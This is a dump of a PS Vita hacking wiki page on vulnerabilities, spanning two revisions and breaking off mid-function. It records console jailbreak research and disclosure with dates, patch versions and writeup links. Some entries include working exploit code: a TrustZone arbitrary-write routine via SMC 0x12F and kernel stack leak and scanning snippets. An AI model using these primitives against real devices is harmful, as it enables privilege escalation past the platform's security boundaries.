The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table). This results in TrustZone level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
#include <stdint.h><br />
#include <string.h><br />
<br />
// Writes 8 bytes from src (Non-secure Kernel memory) to dst (a TrustZone address).<br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
    // The SMC reads 8 bytes from (tz_addr + 0x28). sm_handle is chosen so that tz_addr is the<br />
    // Secure-side alias of the shared region (0x00560000), so planting the data at NS offset<br />
    // 0x28 of the same region (0x00400028) makes the SMC read our bytes.<br />
    memcpy((void *)0x00400028, src, 8);<br />
<br />
    uintptr_t sm_handle = 0x00560000 >> 1;<br />
    uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
    // r0 and r1 are overwritten by the asm, so they are listed as clobbers to keep the<br />
    // compiler from allocating the input operands into them.<br />
    asm volatile(<br />
        "mov r0, %0\n\t"<br />
        "mov r1, %1\n\t"<br />
        "mov r12, #0x12F\n\t"<br />
        "smc #0\n\t"<br />
        : : "r"(sm_handle), "r"(shared_mem_index) : "r0", "r1", "r12", "memory"<br />
    );<br />
}<br />
</source><br />
<br />
To achieve code execution, dst must be set to the SMC table address so that two pointers (8 = 2 * 4 bytes) are planted.<br />
<br />
Patched somewhere after 1.80 and before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code>, which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory), and then later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however, cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to reuse the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table whose entries all point to our payload, we can execute F00D code at bootrom time (before bootrom is unmapped). This is a very desirable glitching target because it requires almost no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
=== Boot ROM Enc buffer overflow ===<br />
<br />
(2019-08-30) The development boot ROM does not check the [[Enc]] header correctly. Specifically, the "code size" field (at offset 0x10) is only checked after adding it to "offset to code". The calculation can overflow, for example, when <code>code_size == -offset_code</code>. Further, when loading an Enc binary from ARM, the size to copy in is calculated as <code>(scratch->code_size + scratch->offset_code) - 0x40</code>. With the sum of code_size and offset_code being 0, this calculation underflows to -0x40, or 0xffffffc0, resulting in a huge amount of data being copied in and overwriting parts of the boot ROM.<br />
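A constructed model of the header check described above, added here as an example (it is not the boot ROM's code): the vulnerable check bounds the already-wrapped sum, while the hardened check bounds each field before adding. The struct layout, the buffer limit and the function names are assumptions; only the two field names, the 0x40 header size and the overflowing arithmetic come from the text.<br />

```c
#include <stdint.h>
#include <stdbool.h>

/* Constructed model of the Enc header check; struct layout and limits are assumptions. */
typedef struct {
    uint32_t offset_code;   /* "offset to code" */
    uint32_t code_size;     /* "code size" (header offset 0x10 in the real format) */
} enc_scratch_t;

#define ENC_HEADER_SIZE 0x40u

/* Vulnerable: the sum code_size + offset_code is computed first and only then
 * bounded, so a header with code_size == -offset_code wraps the sum to 0,
 * passes the check, and the derived copy size (sum - 0x40) underflows to
 * 0xffffffc0. Returns false only when the (possibly wrapped) sum exceeds the limit. */
bool vulnerable_copy_size(const enc_scratch_t *s, uint32_t buffer_limit, uint32_t *copy_size)
{
    uint32_t end = s->code_size + s->offset_code;   /* may wrap */
    if (end > buffer_limit)
        return false;
    *copy_size = end - ENC_HEADER_SIZE;              /* underflows when end < 0x40 */
    return true;
}

/* Hardened: bound each field on its own and compute the remaining room by
 * subtraction, so neither the sum nor the final subtraction can wrap. */
bool hardened_copy_size(const enc_scratch_t *s, uint32_t buffer_limit, uint32_t *copy_size)
{
    if (s->offset_code < ENC_HEADER_SIZE || s->offset_code > buffer_limit)
        return false;
    if (s->code_size > buffer_limit - s->offset_code)
        return false;
    *copy_size = s->offset_code + s->code_size - ENC_HEADER_SIZE;
    return true;
}
```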
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11491Vulnerabilities2019-09-05T20:16:54Z<p>Xyz: /* Boot ROM */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz, in order for HENkaku to be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref>, using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, on the parseFloat() function using a NaN as the argument.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many people. Patched on FW 3.30.<br />
<br />
The heap buffer overflow vulnerability exists within WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts a user-defined JavaScript function and calls it from native code to compare array items. If this compare function reduces the array length, then the trailing array items are written outside the "m_storage->m_vector[]" buffer, which leads to heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it is allocated. If the mutated list contains fewer entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.50-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (Vita FW 3.30-3.71) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next kernel exploit, named 2050 and 2051.<br />
<br />
Working on <= 3.71. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevertheless, a set of tricks allows installing and using PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can therefore be installed using PKG Installer or the BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
The PSM developer license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games do not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is that games developed with SDK 2.60 or lower were compiled as statically linked executables, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to another region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you just fuzz gamesaves by writing random data at random locations until you get a crash (the best bet is extending strings and hoping you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug lies in the bittersmile game's savedata parser. The gamesave is actually a text file, and the game reads it line by line and copies the lines to a list of buffers. However, it doesn't validate the length, thus if we put the delimiter \n far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute our ROP chain. However, it is in the data section; luckily for us, the content after the buffer is the list that contains the destinations for the other lines. This means that if we overflow into the list and redirect a buffer pointer, the next line is copied to wherever we want, which gives us an arbitrary write primitive.<br />
<br />
Not patchable. The Bittersmile game requires a minimum FW of ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn't sanity-check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that however much Sony secures the PSVita store, activation remains possible as long as the PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof firmware version for bypassing FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall number passed in R12 can index past the end of the syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== syscall handler leaks syscall table vaddr ===<br />
<br />
When a syscall is invoked with an invalid syscall id, the SVC handler returns without clearing the syscall table virtual address left in r0.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some interesting functions in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get up to 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
#include <string.h><br />
#include <psp2/io/fcntl.h><br />
#include <psp2/io/devctl.h><br />
<br />
// make a buffer, tagged with '0x66' bytes so untouched regions are recognisable<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf (up to 0x3FF bytes are copied out)<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf (hex_dump is your own helper, not shown here)<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on a firmware shortly before. These exploits are not usable on retail/testkit because the functions used are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be XORed, otherwise SCE_NGS_ERROR_INVALID is returned by sceNgsRackGetRequiredMemorySize.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME value lets the kstack address be found faster on that firmware).<br />
<br />
<source lang="c"><br />
#include <string.h><br />
#include <psp2/io/devctl.h><br />
#include <psp2/kernel/threadmgr.h><br />
#include <psp2/ngs.h><br />
<br />
#define DEVCTL_STACK_FRAME 0x728 // value specific for 1.692<br />
<br />
SceInt32 gRet = 0; // last result of sceNgsRackGetRequiredMemorySize, kept for debugging<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
    SceInt32 ret = 0;<br />
<br />
    SceNgsRackDescription rackDesc;<br />
    rackDesc.nChannelsPerVoice = 1;<br />
    rackDesc.nVoices = 1;<br />
    rackDesc.nMaxPatchesPerInput = 0;<br />
    rackDesc.nPatchesPerOutput = 1;<br />
<br />
    // Build a minimal valid voice definition and let sceIoDevctl copy it onto the kernel stack.<br />
    unsigned int voiceDef[0x400];<br />
    memset(voiceDef, 0x00, sizeof(voiceDef));<br />
    voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
    voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
    voiceDef[2] = 0x40;<br />
    voiceDef[3] = 0x40;<br />
    sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
    sceKernelDelayThread(2 * 1000 * 1000);<br />
<br />
    // Scan one page at a time. The address is passed un-XORed (see the note above); the first<br />
    // candidate not rejected with SCE_NGS_ERROR_INVALID_PARAM is where the copied voice<br />
    // definition sits on the kernel stack, and subtracting the devctl frame offset gives the base.<br />
    for (unsigned int addr = DEVCTL_STACK_FRAME; addr < 0x3000000; addr += 0x1000)<br />
    {<br />
        rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
        ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
        gRet = ret;<br />
        if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
            continue;<br />
        else<br />
            return (addr - DEVCTL_STACK_FRAME);<br />
    }<br />
    return 0xFFFFFFF; // not found<br />
}<br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The two following bugs are exploited by calling memcpy with a negative length, which gives an out-of-bounds access without copying an overly large buffer and without triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, adding it to dst wraps around and yields a value smaller than dst. As a consequence, the later comparison evaluates to false whether it is signed or unsigned, so memcpy believes there are fewer than 32 bytes to copy.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the length is compared as a signed integer. Hence a negative length simply bypasses the copy loop.<br />
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution, the eMMC MBR can be modified to change the block size. However, at this time Yifan was trying to exploit it with an adjacent malloc (controlled_size), couldn't find a way, and left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyz finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL. A function does not check an error return: if it did, the value corrupted by the buffer overflow would not have been used. Later on, the field that was written was used in a separate call.<br />
<br />
This allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A list of imports/exports of the 1.80 TrustZone modules is available at [[File:Psvita_1.80_tz_nids.txt]].<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, making it possible to plant data inside the Non-secure Kernel's view of the region and have the SMC copy this data somewhere into TrustZone memory (e.g. the SMC table). This results in TrustZone-level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
#include <stdint.h><br />
#include <string.h><br />
<br />
/* Stage 8 bytes in the shared region and have SMC 0x12F copy them to dst, a TrustZone address. */<br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
